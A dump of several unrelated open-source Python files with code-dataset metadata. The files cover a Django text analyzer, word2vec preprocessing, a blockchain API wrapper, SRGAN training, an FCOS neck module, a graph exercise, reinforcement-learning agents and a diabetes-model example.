newlineremover = request.POST.get('newlineremover','default')
spaceremover = request.POST.get('spaceremover','default')
#Result text
analyzed = ""
if removepunc == "on":
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed = ""
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
params = {'purpose': 'Remove Punctuations', 'analyzed_text': analyzed,'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if fullcaps == "on":
analyzed = djtext.upper()
params = {'purpose': 'To Upper Case', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if count == "on":
cnt = 0
analyzed = ""
for x in djtext:
if(x.isdigit()):
continue
analyzed+=x
params = {'purpose': 'Number Remover', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if newlineremover == "on":
analyzed = ""
for x in djtext:
if x != '\n' and x!='\r':
analyzed+=x
params = {'purpose': 'New Line Remove', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
#return render(request, 'analyze.html', params)
if spaceremover =="on":
analyzed =""
for x in djtext:
if(x!=' '):
analyzed+=x
params = {'purpose': 'Space Remove', 'analyzed_text': analyzed, 'input_text': djtext}
djtext = analyzed
if spaceremover !="on" and newlineremover != "on" and count != "on" and fullcaps != "on" and removepunc != "on":
return HttpResponse("Select any option and try again")
return render(request, 'analyze.html', params)
def about(request):
return render(request, 'about.html')
def contact(request):
return render(request, 'contact.html')
| Bibhash7/Textlyzer | mysite/views.py | views.py | py | 2,508 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 69,
"usage_type": "call"
},
{
"api_name"... |
39666743662 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 20:18:14 2017
@author: user
"""
import csv
import numpy as np
from gensim.models import word2vec
content_POS = list(np.load('all_content_POS.npy'))
"""取出n,a,d,v詞性的詞"""
sentiment_POS = []
sentiment_content = []
ADNV = [1,3,7,13]
for sentence in content_POS:
sen = []
for word in sentence:
if word[1] in ADNV:
sen.append(word)
if len(sen) != 0:
sentiment_POS.append(sen)
"""刪除停用詞"""
print("delete stopword")
stopwordset = set()
with open('stopwords.txt','r',encoding='utf-8') as sw:
stopwordset.add(' ')
for line in sw:
stopwordset.add(line.strip('\n'))
for sentence in sentiment_POS:
temp_sen = []
for word in sentence:
if word[0] not in stopwordset:
temp_sen.append(word[0])
sentiment_content.append(temp_sen)
f = open('sentiment_content.txt', 'w', encoding='utf-8')
spamwriter = csv.writer(f, lineterminator = '\n', delimiter=' ', quoting = csv.QUOTE_NONE)
spamwriter.writerows(sentiment_content)
f.close()
"""訓練詞向量"""
print("train word2vec")
sentences = word2vec.Text8Corpus('sentiment_content.txt')
model = word2vec.Word2Vec(sentences, size=250) # default sg = 0, use CBOW, hs = 0, use negative smapling
model.save_word2vec_format(u'med250.model.bin', binary=True)
"""bin檔轉txt,讀單詞向量"""
model = word2vec.Word2Vec.load_word2vec_format('med250.model.bin', binary=True)
model.save_word2vec_format('med250.model.txt', binary=False)
word_list = []
vec_list = []
f = open('med250.model.txt','r',encoding = 'utf-8')
for r,row in enumerate(csv.reader(f)):
if r==0:
line = row[0].split(' ')
total_num = int(line[0])
vec_len = int(line[1])
#np.save('total_num',total_num)
else:
line = row[0].split(' ')
word = line[0]
vec = []
for v in line[1:250]:
vec.extend([float(v)])
word_list.extend([word])
vec_list.append(vec)
np.save('word_list',word_list)
np.save('vec_list',vec_list)
f.close()
# word_vec = [list(np.load('word_list.npy')),np.load('vec_list.npy')]
| Maomaomaoing/Sacasm-Detection | 2.word2vector_pre.py | 2.word2vector_pre.py | py | 2,254 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "csv.writer",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "csv.QUOTE_NONE",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "gensim.models.word2vec.Text... |
72284442024 | import kth_native as nat
import sys
import time
import asyncio
import kth
# def fetch_last_height_async(chain):
# loop = asyncio.get_event_loop()
# fut = loop.create_future()
# nat.chain_fetch_last_height(chain, lambda err, h: fut.set_result((err, h)))
# return fut
def generic_async_1(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a: fut.set_result((a)))
return fut
def generic_async_2(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a, b: fut.set_result((a, b)))
return fut
def generic_async_3(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a, b, c: fut.set_result((a, b, c)))
return fut
def generic_async_4(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a, b, c, d: fut.set_result((a, b, c, d)))
return fut
# async def generic_async_3(func, *args):
# future = asyncio.Future()
# loop = asyncio.get_event_loop()
# def callback(args):
# loop.call_soon_threadsafe(future.set_result, args)
# func(*args, callback)
# callback_args = await future
# return callback_args
##
# Represents the Bitcoin blockchain.
class Chain:
def __init__(self, executor, chain):
##
# @private
self._executor = executor
self._chain = chain
# Gets the height of the highest block in the local copy of the blockchain.
# This number will grow as the node synchronizes with the blockchain.
# This is an asynchronous method; a callback must be provided to receive the result
async def getLastHeight(self):
# ret = await fetch_last_height_async(self._chain)
ret = await generic_async_2(nat.chain_fetch_last_height, self._chain)
return ret
# Given a block hash, it queries the chain for the block height.
async def getBlockHeight(self, hash):
# nat.chain_fetch_block_height(self._chain, hash, handler)
ret = await generic_async_2(nat.chain_fetch_block_height, self._chain, hash)
return ret
# Get the block header from the specified height in the chain.
async def getBlockHeaderByHeight(self, height):
# nat.chain_fetch_block_header_by_height(self._chain, height, self._fetch_block_header_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_header_by_height, self._chain, height)
if err != 0:
return (err, None, height)
return (err, kth.chain.Header.fromNative(obj), height)
# Get the block header from the specified block hash.
async def getBlockHeaderByHash(self, hash):
# nat.chain_fetch_block_header_by_hash(self._chain, hash, self._fetch_block_header_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_header_by_hash, self._chain, hash)
if err != 0:
return (err, None, height)
return (err, kth.chain.Header.fromNative(obj), height)
# Gets a block from the specified height in the chain.
async def getBlockByHeight(self, height):
# nat.chain_fetch_block_by_height(self._chain, height, self._fetch_block_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_by_height, self._chain, height)
if err != 0:
return (err, None, height)
return (err, kth.chain.Block.fromNative(obj), height)
# Gets a block from the specified hash.
async def getBlockByHash(self, hash):
# nat.chain_fetch_block_by_hash(self._chain, hash, self._fetch_block_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_by_hash, self._chain, hash)
if err != 0:
return (err, None, height)
return (err, kth.chain.Block.fromNative(obj), height)
# Get a transaction by its hash.
async def getTransaction(self, hash, require_confirmed):
# nat.chain_fetch_transaction(self._chain, hash, require_confirmed, self._fetch_transaction_converter)
(err, obj, index, height) = await generic_async_4(nat.chain_fetch_transaction, self._chain, hash, require_confirmed)
if err != 0:
return (err, None, index, height)
return (err, kth.chain.Transaction.fromNative(obj), index, height)
# Given a transaction hash, it fetches the height and position inside the block.
async def getTransactionPosition(self, hash, require_confirmed):
# nat.chain_fetch_transaction_position(self._chain, hash, require_confirmed, handler)
ret = await generic_async_3(nat.chain_fetch_transaction_position, self._chain, hash, require_confirmed)
return ret
##
# Given a block height in the chain, it retrieves the block's associated Merkle block.
# Args:
# height (unsigned int): Block height in the chain.
# handler (Callable (error, merkle_block, block_height)): Will be executed when the chain is queried.
# * error (int): Error code. 0 if successful.
# * merkle_block (MerkleBlock): The requested block's Merkle block.
# * block_height (unsigned int): The block's height in the chain.
def fetch_merkle_block_by_height(self, height, handler):
self._fetch_merkle_block_handler = handler
nat.chain_fetch_merkle_block_by_height(self._chain, height, self._fetch_merkle_block_converter)
##
# Given a block hash, it retrieves the block's associated Merkle block.
# Args:
# hash (bytearray): 32 bytes of the block hash.
# handler (Callable (error, merkle_block, block_height)): Will be executed when the chain is queried.
# * error (int): Error code. 0 if successful.
# * merkle_block (MerkleBlock): The requested block's Merkle block.
# * block_height (unsigned int): The block's height in the chain.
def fetch_merkle_block_by_hash(self, hash, handler):
self._fetch_merkle_block_handler = handler
nat.chain_fetch_merkle_block_by_hash(self._chain, hash, self._fetch_merkle_block_converter)
# ----------------------------------------------------------------------------
# Note: removed on 3.3.0
# def _fetch_output_converter(self, e, output):
# if e == 0:
# _output = Output(output)
# else:
# _output = None
# self._fetch_output_handler(e, _output)
# ##
# # Get a transaction output by its transaction hash and index inside the transaction.
# # Args:
# # hash (bytearray): 32 bytes of the transaction hash.
# # index (unsigned int): Output index inside the transaction (starting at zero).
# # require_confirmed (int): 1 if and only if transaction should be in a block, 0 otherwise.
# # handler (Callable (error, output)): Will be executed when the chain is queried.
# # * error (int): Error code. 0 if successful.
# # * output (Output): Output found.
# def fetch_output(self, hash, index, require_confirmed, handler):
# self._fetch_output_handler = handler
# nat.chain_fetch_output(self._chain, hash, index, require_confirmed, self._fetch_output_converter)
# ----------------------------------------------------------------------------
async def organizeBlock(self, block):
# void chain_organize_handler(kth_chain_t chain, void* ctx, kth_error_code_t error) {
ret = await generic_async_1(nat.chain_organize_block, self._chain, block.toNative())
return ret
# nat.chain_organize_block(self._chain, block, handler)
async def organizeTransaction(self, transaction):
# nat.chain_organize_transaction(self._chain, transaction, handler)
ret = await generic_async_1(nat.chain_organize_transaction, self._chain, transaction.toNative())
return ret
##
# Determine if a transaction is valid for submission to the blockchain.
# Args:
# transaction (Transaction): transaction to be checked.
# handler (Callable (error, message)): Will be executed after the chain is queried.
# * error (int): error code. 0 if successful.
# * message (str): string describing the result of the query. Example: 'The transaction is valid'
def validate_tx(self, transaction, handler):
nat.chain_validate_tx(self._chain, transaction, handler)
def _fetch_compact_block_converter(self, e, compact_block, height):
if e == 0:
_compact_block = _CompactBlock(compact_block)
else:
_compact_block = None
self._fetch_compact_block_handler(e, _compact_block, height)
def _fetch_compact_block_by_height(self, height, handler):
self._fetch_compact_block_handler = handler
nat.chain_fetch_compact_block_by_height(self._chain, height, self._fetch_compact_block_converter)
def _fetch_compact_block_by_hash(self, hash, handler):
self._fetch_compact_block_handler = handler
nat.chain_fetch_compact_block_by_hash(self._chain, hash, self._fetch_compact_block_converter)
def _fetch_spend_converter(self, e, point):
if e == 0:
_spend = Point(point)
else:
_spend = None
self._fetch_spend_handler(e, _spend)
##
# Fetch the transaction input which spends the indicated output. The `fetch_spend_handler`
# callback will be executed after querying the chain.
# Args:
# output_point (OutputPoint): tx hash and index pair.
# handler (Callable (error, input_point)): Will be executed when the chain is queried.
# * error (int): Error code. 0 if successful.
# * input_point (Point): Tx hash and index pair where the output was spent.
def fetch_spend(self, output_point, handler):
self._fetch_spend_handler = handler
nat.chain_fetch_spend(self._chain, output_point._ptr, self._fetch_spend_converter)
def _subscribe_blockchain_converter(self, e, fork_height, blocks_incoming, blocks_replaced):
if self._executor.stopped or e == 1:
return False
if e == 0:
_incoming = BlockList(blocks_incoming) if blocks_incoming else None
_replaced = BlockList(blocks_replaced) if blocks_replaced else None
else:
_incoming = None
_replaced = None
return self._subscribe_blockchain_handler(e, fork_height, _incoming, _replaced)
def subscribe_blockchain(self, handler):
self._subscribe_blockchain_handler = handler
nat.chain_subscribe_blockchain(self._executor._executor, self._chain, self._subscribe_blockchain_converter)
def _subscribe_transaction_converter(self, e, tx):
if self._executor.stopped or e == 1:
return False
if e == 0:
_tx = Transacion(tx) if tx else None
else:
_tx = None
self._subscribe_transaction_handler(e, _tx)
def _subscribe_transaction(self, handler):
self._subscribe_transaction_handler = handler
nat.chain_subscribe_transaction(self._executor._executor, self._chain, self._subscribe_transaction_converter)
def unsubscribe(self):
nat.chain_unsubscribe(self._chain)
##
# @var history_fetch_handler_
# Internal callback which is called by the native fetch_history function and marshalls parameters to the managed callback
##
# @var fetch_block_header_handler_
# Internal callback which is called by the native fetch_block_header function and marshalls parameters to the managed callback
# ----------------------------------------------------------------------
# TODO(fernando): implement the following
# ----------------------------------------------------------------------
# ##
# # Get a list of output points, values, and spends for a given payment address.
# # This is an asynchronous method; a callback must be provided to receive the result
# #
# # Args:
# # address (PaymentAddress): Wallet to search.
# # limit (unsigned int): Max amount of results to fetch.
# # from_height (unsigned int): Starting height to search for transactions.
# # handler (Callable (error, list)): Will be executed when the chain is queried.
# # * error (int): Error code. 0 if and only if successful.
# # * list (HistoryList): A list with every element found.
# def fetch_history(self, address, limit, from_height, handler):
# self.history_fetch_handler_ = handler
# nat.chain_fetch_history(self._chain, address, limit, from_height, self._history_fetch_handler_converter)
# def _history_fetch_handler_converter(self, e, l):
# if e == 0:
# list = HistoryList(l)
# else:
# list = None
# self.history_fetch_handler_(e, list)
# ##### Stealth
# def _stealth_fetch_handler_converter(self, e, l):
# if e == 0:
# _list = StealthList(l)
# else:
# _list = None
# self._stealth_fetch_handler(e, _list)
# ##
# # Get metadata on potential payment transactions by stealth filter.
# # Given a filter and a height in the chain, it queries the chain for transactions matching the given filter.
# # Args:
# # binary_filter_str (string): Must be at least 8 bits in length. example "10101010"
# # from_height (unsigned int): Starting height in the chain to search for transactions.
# # handler (Callable (error, list)): Will be executed when the chain is queried.
# # * error (int): Error code. 0 if and only if successful.
# # * list (StealthList): list with every transaction matching the given filter.
# def fetch_stealth(self, binary_filter_str, from_height, handler):
# self._stealth_fetch_handler = handler
# binary_filter = Binary.construct_string(binary_filter_str)
# nat.chain_fetch_stealth(self._chain, binary_filter._ptr, from_height, self._stealth_fetch_handler_converter)
| k-nuth/py-api | kth/chain/chain.py | chain.py | py | 14,093 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "asyncio.get_event_loop",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "... |
5491251302 | import sys
import os
sys.path.append(os.path.abspath('.'))
import torch
import utils as ut
from train import *
from dataset import load_train_data, load_test_data
import constants
def main(config):
# Fixed random number seed
torch.manual_seed(config.seed)
torch.cuda.manual_seed_all(config.seed)
# Initialize image evaluation metrics
best_psnr = 0.0
best_ssim = 0.0
if config.train.checkpoint.is_log:
ut.log_on_train_start(log_name=config.exp_name, config=config)
checkpoint_dir = os.path.join(constants.ROOT, 'model', config.exp_name)
ut.create_dir(checkpoint_dir)
# Define basic elements for training
netG, netD = define_model(config)
# optimG = define_optimizer(netG, config)
# optimD = define_optimizer(netD, config)
optimG = optim.Adam(netG.parameters(),
lr=config.train.optim.lr,
betas=config.train.optim.betas)
optimD = optim.Adam(netD.parameters(),
lr=config.train.optim.lr,
betas=config.train.optim.betas)
schedulerG = define_scheduler(optimG, config)
schedulerD = define_scheduler(optimD, config)
if config.train.checkpoint.load_model:
G_state_dict, optimG_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.gen)
D_state_dict, optimD_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.disc)
netG.load_state_dict(G_state_dict)
netD.load_state_dict(D_state_dict)
optimG.load_state_dict(optimG_state_dict)
optimD.load_state_dict(optimD_state_dict)
# Loss function
content_criteria = nn.MSELoss()
adversarial_criteria = nn.BCEWithLogitsLoss()
feature_extractor = VGGLoss()
feature_extractor = feature_extractor.to(constants.DEVICE)
feature_extractor.eval()
# Data loader
print("Loading data ...")
train_loader = load_train_data(root=config.train.dataset.data_dir, batch_size=config.train.hyp.batch_size)
test_loader = load_test_data(hr_root=config.test.dataset.hr_dir, lr_root=config.test.dataset.lr_dir)
print("Finish loading data")
for epoch in range(config.train.hyp.num_epoch):
netG.train()
netD.train()
D_loss, G_loss = train(
train_loader,
epoch,
netG,
netD,
optimG,
optimD,
content_criteria,
adversarial_criteria,
feature_extractor,
config)
schedulerD.step()
schedulerG.step()
psnr, ssim = test(test_loader, netG)
is_best = psnr > best_psnr and ssim > best_psnr
best_psnr = max(psnr, best_psnr)
best_ssim = max(ssim, best_ssim)
print("D_loss: %.6f, G_loss: %.6f, psnr: %.6f, ssim: %.6f" % (D_loss, G_loss, psnr, ssim))
ut.save_checkpoint(
{
"epoch": epoch + 1,
"model": netD.state_dict(),
"optimizer": optimD.state_dict(),
},
f'{checkpoint_dir}/disc_{epoch+1}.pth.tar',
f'{checkpoint_dir}/disc_best.pth.tar',
is_best)
ut.save_checkpoint(
{
"epoch": epoch + 1,
"model": netG.state_dict(),
"optimizer": optimG.state_dict(),
},
f'{checkpoint_dir}/gen_{epoch+1}.pth.tar',
f'{checkpoint_dir}/gen_best.pth.tar',
is_best)
if __name__ == '__main__':
main_config = ut.read_config(os.path.join(constants.ROOT,'config/config.yaml'))
main(main_config)
| daoduyhungkaistgit/SRGAN | src/main.py | main.py | py | 3,641 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
18482571232 | import math
import torch.nn as nn
class HRNET_NECK(nn.Module):
def __init__(self, in_channels, feature_size=256):
super(HRNET_NECK, self).__init__()
C2_size, C3_size, C4_size, C5_size = in_channels
# P2
self.P2_1 = nn.Conv2d(C2_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P2_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P3
self.P3_1 = nn.Conv2d(C3_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P3_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P4
self.P4_1 = nn.Conv2d(C4_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P4_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P5
self.P5_1 = nn.Conv2d(C5_size, feature_size, kernel_size=1, stride=1, padding=0)
# "P6 is obtained via a 3x3 stride-2 conv on C5"
self.P6 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# "P6 is computed by applying ReLU followed by a 3x3 stride-2 conv on P6"
self.P7_1 = nn.ReLU()
self.P7_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, inputs):
C2, C3, C4, C5 = inputs
P2_x = self.P2_1(C2)
P2_downsample = self.P2_2(P2_x)
P3_x = self.P3_1(C3)
P3_x = P2_downsample + P3_x
P3_downsample = self.P3_2(P3_x)
P4_x = self.P4_1(C4)
P4_x = P4_x + P3_downsample
P4_downsample = self.P4_2(P4_x)
P5_x = self.P5_1(C5)
P5_x = P5_x + P4_downsample
P6_x = self.P6(P5_x)
P7_x = self.P7_1(P6_x)
P7_x = self.P7_2(P7_x)
return [P3_x, P4_x, P5_x, P6_x, P7_x]
| TWSFar/FCOS | models/necks/hrnet_neck.py | hrnet_neck.py | py | 2,155 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
30569760677 | from typing import List, Tuple
def create_adjacent_list(edges):
adjacent_list = dict()
for edge in edges:
if adjacent_list.get(edge[0]):
adjacent_list[edge[0]].append(edge[1])
else:
adjacent_list[edge[0]] = [edge[1]]
return adjacent_list
def solution(n: int, m: int, edges: List[Tuple[int, int]]):
adjacents_list = create_adjacent_list(edges)
for i in range(1, n + 1):
temp = [0] * n
if adjacents_list.get(i):
vertex = adjacents_list.get(i)
for v in vertex:
temp[v - 1] = 1
print(' '.join(map(str, temp)))
def input_data():
n, m = map(int, input().strip().split())
rows = m
edges = list()
while rows:
edges.append(tuple(map(int, input().strip().split())))
rows -= 1
return n, m, edges
if __name__ == '__main__':
solution(*input_data())
"""
5 3
1 3
2 3
5 2
"""
| fenixguard/yandex_algorithms | sprint_6/B.exchange_edges_list_to_adjacent_list.py | B.exchange_edges_list_to_adjacent_list.py | py | 935 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 14,
"usage_type": "name"
}
] |
8860920055 | from collections import defaultdict
import Policy as policy
import random
import numpy as np
import matplotlib.pyplot as plt
# import pytorch as torch
class Agent:
def __init__(self, env) -> None:
self.env = env
# replay_buffer = {(state, action) : (state_, reward)}
self.replay_buffer = defaultdict(lambda : tuple(list, float))
# visisted_states = {state}
self.visisted_states = set()
self.state = self.env.reset()
# Decide an action from a given state
# Returns True if the environment is done (won or lost)
def next(self) -> bool:
return False
# Shallow agent for discrete environments or continuous environments with a small state space
class ShallowAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
# self.v = {state : value}
self.V = defaultdict(lambda : 0)
# self.q = {(state, action) : value}
self.Q = defaultdict(lambda : 0)
# Deep agent for continuous environments or discrete environments with a large state space
class DeepAgent(Agent):
def __init__(self, env, weight_size) -> None:
super().__init__(env)
# self.w = torch.rand(weight_size)
class DiscreteQLearningAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
class DiscreteActionValueIterationAgent(Agent):
def __init__(self, env, policy = policy.random) -> None:
super().__init__(env)
self.policy = policy
def next(self) -> bool:
# Action value iteration function
q = defaultdict(lambda : 0)
for state in self.env.get_states():
for action in self.env.A(state):
trans_prob = self.env.get_transistion_probabilities(state, action)
temp = 0
for next_state, reward in trans_prob:
pi = self.policy(self.env, next_state, self.q)
temp += trans_prob[(next_state, reward)]*(reward + 0.99*sum([pi[action_] * self.q[(next_state,action_)] for action_ in self.env.A(next_state)]))
q[(state,action)] = temp
self.q = q
# Value iteration function
v = defaultdict(lambda : 0)
for state in self.env.get_states():
actions = self.env.A(state)
for action in actions:
pi = 1/len(actions)
temp = 0
trans_prob = self.env.get_transistion_probabilities(state, action)
# Get reward, next state
for next_state, reward in trans_prob.keys():
temp += trans_prob[(next_state,reward)]*(reward + 0.99*self.v[next_state])
pi = self.policy(self.env, state, self.q)
v[state] += pi[action] * temp
self.v = v
return True
class ManualAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
def next(self):
while(True):
print("Current state: " + str(self.env.state))
print("Total reward: " + str(self.env.get_accumulative_reward(self)))
print("---------------")
print("Enter next action")
print("Avaliable actions: " + str(self.env.A(self.state)))
try:
action = input()
if action == "exit":
return False
action = int(action)
print("\n")
if(action <= self.env.A(self.state)[-1]):
next_state, reward = self.env.step(self.state, action)
self.state = next_state
self.visited_states.append(self.state)
self.previous_actions.append(action)
self.obtained_rewards.append(reward)
print("---------------")
print("Reward: " + str(reward))
print("---------------")
return True
else:
print("Invalid action")
except ValueError:
print("The provided string is not a valid representation of an integer.\n"+
"Please enter a valid integer in the action space")
| TheGoldenChicken/robust-rl | rl/agent.py | agent.py | py | 4,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 36,
"usage_type": "call"
},
{
"api_name"... |
25163328807 | import operator
import pandas as pd
from easul.action import ResultStoreAction
from easul.algorithm import StoredAlgorithm
from easul.algorithm.factor import OperatorFactor
from easul.data import DataSchema, DFDataInput
from easul.step import VisualStep
from easul.visual import Visual
from easul.visual.element import Prediction
from easul.visual.element.container import HorizContainer, CardContainer, Container
from easul.visual.element.journey import JourneyMap
from easul.visual.element.overall import RocCurve, Accuracy, BalancedAccuracy, Ppp, Npp, Sensitivity, Matthews, \
ModelScore
from easul.visual.element.prediction import ProbabilityPlot, LimeTablePlot
from easul.visual.element.overall import Specificity
import os
import numpy as np
EXAMPLE_PATH = os.path.dirname(__file__) + "/support"
DIABETES_FILE = EXAMPLE_PATH + "/diabetes.txt"
def diabetes_progression_algorithm():
from easul.algorithm import ClassifierAlgorithm
from sklearn.linear_model import LogisticRegression
diab_train = diabetes_progression_dataset()
diab_alg = ClassifierAlgorithm(title="Diabetes progression", model=LogisticRegression(max_iter=500), schema=diab_train.schema)
diab_alg.fit(diab_train)
return diab_alg
def diabetes_progression_dataset():
diab_dset = load_diabetes(raw=True, as_classifier=True)
diab_train, diab_test = diab_dset.train_test_split(train_size=0.75)
return diab_train
# *Data Set Characteristics:**
# :Number of Instances: 442
#
# :Number of Attributes: First 10 columns are numeric predictive values
#
# :Target: Column 11 is a quantitative measure of disease progression one year after baseline
#
# :Attribute Information:
# - age age in years
# - sex
# - bmi body mass index
# - bp average blood pressure
# - s1 tc, total serum cholesterol
# - s2 ldl, low-density lipoproteins
# - s3 hdl, high-density lipoproteins
# - s4 tch, total cholesterol / HDL
# - s5 ltg, possibly log of serum triglycerides level
# - s6 glu, blood sugar level
#
# Note: Each of these 10 feature variables have been mean centered and scaled by the standard deviation times `n_samples` (i.e. the sum of squares of each column totals 1).
#
# Source URL:
# https://www4.stat.ncsu.edu/~boos/var.select/diabetes.html
#
# For more information see:
# Bradley Efron, Trevor Hastie, Iain Johnstone and Robert Tibshirani (2004) "Least Angle Regression," Annals of Statistics (with discussion), 407-499.
# (https://web.stanford.edu/~hastie/Papers/LARS/LeastAngle_2002.pdf)
def load_diabetes(raw=False, as_classifier=False):
import pandas as pd
if raw:
schema = DataSchema(
schema={
"age": {"type": "number", "help": "Age in years"},
"sex": {"type": "category", "options": {1: "Male", 2: "Female"}, "help": "Gender",
"pre_convert": "integer"},
"bmi": {"type": "number", "help": "Body mass index"},
"bp": {"type": "number", "help": "Avg blood pressure"},
"s1": {"type": "number", "help": "tc, total serum cholesterol"},
"s2": {"type": "number", "help": "ldl, low-density lipoproteins"},
"s3": {"type": "number", "help": "hdl, high-density lipoproteins"},
"s4": {"type": "number", "help": "tch, total cholesterol / HDL"},
"s5": {"type": "number", "help": "ltg, possibly log of serum triglycerides level"},
"s6": {"type": "number", "help": "glu, blood sugar level"},
"y": {
"type": "number",
"help": "disease progression (<1 yr)"
}
},
y_names=["y"],
)
df = pd.read_csv(
DIABETES_FILE, delimiter="\t"
)
else:
schema = DataSchema(
schema={
"age": {"type": "number", "help": "Age in years", "min": -1, "max": 1},
"sex": {"type": "category", "options": {-0.04464: "Male", 0.05068: "Female"}, "help": "Gender",
"pre_convert": "integer"},
"bmi": {"type": "number", "help": "Body mass index", "min": -1, "max": 1},
"bp": {"type": "number", "help": "Avg blood pressure", "min": -1, "max": 1},
"s1": {"type": "number", "help": "tc, total serum cholesterol", "min": -1, "max": 1},
"s2": {"type": "number", "help": "ldl, low-density lipoproteins", "min": -1, "max": 1},
"s3": {"type": "number", "help": "hdl, high-density lipoproteins", "min": -1, "max": 1},
"s4": {"type": "number", "help": "tch, total cholesterol / HDL", "min": -1, "max": 1},
"s5": {"type": "number", "help": "ltg, possibly log of serum triglycerides level", "min": -1, "max": 1},
"s6": {"type": "number", "help": "glu, blood sugar level", "min": -1, "max": 1},
"y": {
"type": "number",
"help": "disease progression (<1 yr)"
}
},
y_names=["y"],
)
from sklearn.datasets import load_diabetes
diabetes = load_diabetes()
df = pd.DataFrame(data=diabetes.data, columns=diabetes.feature_names)
df["y"] = diabetes.target
if as_classifier:
schema["y"] = {"type": "category", "help": "Boolean flag for disease progression",
"pre_convert": "integer", "options": {0: "No progression", 1: "Progression"}}
df["y"] = df["y"].apply(lambda x: 1 if x > 150 else 0)
return DFDataInput(data=df, schema=schema)
model_scope_elements = [
CardContainer(
title="The rating below is an average of the accuracies, correlation and AUC scores",
name="rating_card",
elements=[
ModelScore(title="What is the model rating (out of 100)"),
CardContainer(title="The individual aspects of the model can be examined below",
name="individual_card",
heading_level=5,
elements=[
HorizContainer(
elements=[
RocCurve(name="roc", title="ROC curve", width=5, height=5),
Container(
elements=[
Accuracy(name="accu", title="How accurate is the model overall?",
round_dp=1),
BalancedAccuracy(name="bal_accu",
title="How accurate if the responses were balanced?",
round_dp=1),
Ppp(name="ppp", title="Positives correctly identified (PPV)",
round_dp=1),
Npp(name="ppp", title="Negatives correctly identified (NPV)",
round_dp=1),
Sensitivity(name="sens",
title="True positives out of identified positives (Sensitivity)",
round_dp=1),
Specificity(name="specs",
title="True negatives out of identified negatives (Specificity)",
round_dp=1),
Matthews(name="matt",
title="Prediction correlation (Matthews) (between -1 and 1)",
round_dp=1
)
]
)
]
)
]
)
]
)
]
row_scope_elements = [
HorizContainer(elements=[
CardContainer(
title="Prediction and probabilities of survival or death",
elements=[
HorizContainer(elements=[
Prediction(name="pred", title="Prediction", show_label=True, as_value=False,
html_class="bg-info",
html_tag="h5"),
ProbabilityPlot(name="probs", height=4, width=4, title="Probability plot")
]),
CardContainer(
title="Explanation of how supplied values affect the likelihood of this prediction?",
name="lime_card",
heading_level=5,
elements=[
LimeTablePlot()
])
])
])
]
def complex_plan():
from easul.decision import BinaryDecision
from easul.plan import Plan
from easul.visual.element.journey import JourneyMap
from easul.state import State
from easul.step import EndStep, StartStep, Step, AlgorithmStep, PreStep, VisualStep
from easul.visual import Visual
from easul.action import PreRunStateAction
